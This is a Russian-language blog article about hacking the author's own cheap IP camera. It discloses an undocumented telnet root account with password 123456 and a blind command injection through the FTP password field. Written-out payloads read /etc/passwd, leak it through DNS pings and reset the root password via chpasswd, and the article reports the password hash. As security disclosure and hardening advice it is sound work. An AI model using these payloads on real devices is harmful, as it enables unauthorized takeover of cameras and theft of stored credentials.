Pull to refresh

Как я взломал свою ip-камеру и нашел там бекдор

Reading time 5 min
Views 135K
Original author: @zh4ck
Время пришло. Я купил себе второе IoT устройство в виде дешевой ip-камеры. Мои ожидания относящиеся к безопасности этой камеры были не высоки, это была самая дешевая камера из всех. Но она смогла меня удивить.


Я открыл коробку, и первое что увидел — это пароль из 4 цифр. Это пароль пользователя «Администратор», для настройки устройства. Смотрите видео ниже. Большинство людей не заботятся о том, чтобы поменять этот пароль.

Очевидно, что эта камера может общаться по Ethernet кабелю или Wi-Fi. Порадовала поддержка WPA2, однако люди склонны оставить Wi-Fi незащищённым.

Перехватив трафик между камерой и десктопным приложением, легко заметить что данные передаются по HTTP через 81 порт. Просто гениальное управление сеансом. Имя пользователя и пароль передаются в каждом GET запросе, без шифрования. Хоть Wi-Fi был защищён.

К счастью десктопное приложение сохраняет для вас пароль в открытом виде в файле:

"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

Эта замечательная камера обращается к облаку по UDP. Серверы находятся в Гонконге и Китае. Если вам инетересно, зачем ip-камере подключение к облаку, то всё просто. Эта камера умеет взаимодействовать с мобильными приложениями для Android и IOS. И пользователи подключаются к облаку, чтобы не заморачиваться с настройкой портов и DNS. Супер.

Натравим nmap на это устройство.

PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     BusyBox telnetd
81/tcp   open  http       GoAhead-Webs httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized
|_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open  tcpwrapped

Определился HTTP сервер, Telnet сервер на BusyBox, и какой-то порт 8600. В 27-страничном руководстве не говорится ни слова про Telnet. Как нам назвать этот порт? Отладочный порт? Или бекдор порт? Посмотрим. Я вручную попробовал несколько паролей для пользователя root, но ни один из них не сработал. Я двинулся дальше.

Двойная Слепая инъекция


IP-камера может загружать снимки на FTP сервер. Однако эта опция требует предварительной настройки. Когда я её настроил, оказалось что это не работает. Имя пользователя и пароль от сервера были не верными. После некоторой отладки выяснилось, проблема была в том, что у меня пароль содержал символ $. И я начал копать. Я был уверен, что эта уязвимость позволяет вставлять команды, но не знал как её использовать. Были многочисленные проблемы, усложняющие эксплуатацию. Я называю эту уязвимость двойной слепой инъекцией. Во первых мы не видим вывод этой команды, а во вторых, ёё выполнение происходит в другом потоке. Таким образом использование sleep ни к чему не приводит.

Но третья проблема была хуже всех — это ограничение в 32 символа. Я мог отправить некоторую информацию через DNS. И с помощью следующих команд, я мог получить текущий каталог:

$(ping%20-c%202%20%60pwd%60)

Или та же команда в читаемом виде:

$(ping -c 2 `pwd`)

но мне не удавалось вытащить информацию из /etc/passwd. Я попытался выполнить $(reboot), но это была очень плохая идея, и камера ушла в бесконечный ребут, а кнопки аппаратного сброса не работали. Весёлые времена.

Ниже представлены мои отчаянные попытки получить доступ к оболочке. Спасибо EQ за его помощь в процессе ночного взлома. И за его великие идеи.

$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`)           ;leak it via DNS

После того, как я наконец взломал камеру, возникла следующая проблема. Там не было команд head, tr, less, more или cut. Небыло nc и даже bash`а не было…

Я даже пытался использовать commix, из видео на Youtube он подавал большие надежды. Commix похож на sqlmap но только для инъекций команд. Однако этот случай, для него был слишком сложен.



После многочисленных неудачных попыток, я наконец-то нашёл пароль. Сезам откройся.

$(echo 'root:passwd'|chpasswd)

Логинимся через telnet

(none) login: root
Password:

BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

Вау Вау :) Я быстро нашёл место, куда инъектилась моя команда:

# cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir  PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye

Всякий раз когда мы вводим команду в поле пароля, она копируется в этот скрипт, который затем исполняется. После этого я испугался, что забыл сохранить содержимое /etc/passwd, так как собирался взломать ещё и дефолтный пароль на telnet. К счастью, ребут восстановил исходные данные.

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

К сожалению запускать старый добрый John The Ripper не пришлось, так как гугл подсказал что это хеш пароля 123456. Это куда безопасней чем пароль багажа.



Пора резюмировать то, что у нас есть. Существует недокументированный telnet'овский порт IP-камеры, с паролем: 123456 для пользователя root, нет GUI, чтобы изменить этот пароль, а если изменить его с помощью консоли, он вернётся после следующей перезагрузки. Я думаю, что это смело можно назвать бэкдором.

С помощью root доступа к консоли мы можем получить пароль для FTP-сервера, для сервера SMTP (для оповещений), пароль WiFi (хотя мы, вероятно, его уже имеем), доступ к административному интерфейсу камеры, или просто можем перенастроить камеру как мы хотим. К счастью, чаще всего этот порт Telnet находится за NAT или брандмауэром, поэтому он не доступен из интернета. Но всегда есть исключения. К счастью, UPNP не позволяет настроить порт Telnet, чтобы он был доступен из Интернета, только камера HTTP порт 81. Вас защищает только тот пароль из 4 цифр, что стоит по умолчанию.

И последнее, всё работает от root`а, что не удивительно.

Мой список изменений


Я добавил эти строки в конец файла /system/init/ipcam.sh:

sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd

Кроме того, если вы хотите, вы можете отключить службу телнет закомментировав Telnetd в /system/init/ipcam.sh.

Если хотите, отключите подключение к облаку (вы не сможете использовать мобильные приложения), поместите следующую команду в начало файла /system/init/ipcam.sh

iptables -A OUTPUT -p udp ! --dport 53 -j DROP

Вы можете использовать OpenVPN для подключения к домашней сети, чтобы получить доступ к веб-интерфейсу камеры. Он работает с Android, IOS, и любой десктопной ОС.

99% людей, которые покупают эти IP-камеры думают, что они будут в безопасности с ней. Теперь я понимаю, наклейку, которая поставляется вместе с IP-камерой.



Так что, когда Вы в следующем эпизоде ​​Mr Robot увидите как кто-то подключился к ip-камере через Telnet с root:123456, вы будете знать, что это печальная реальность.
Tags:
Hubs:
+118
Comments 58
Comments Comments 58

Articles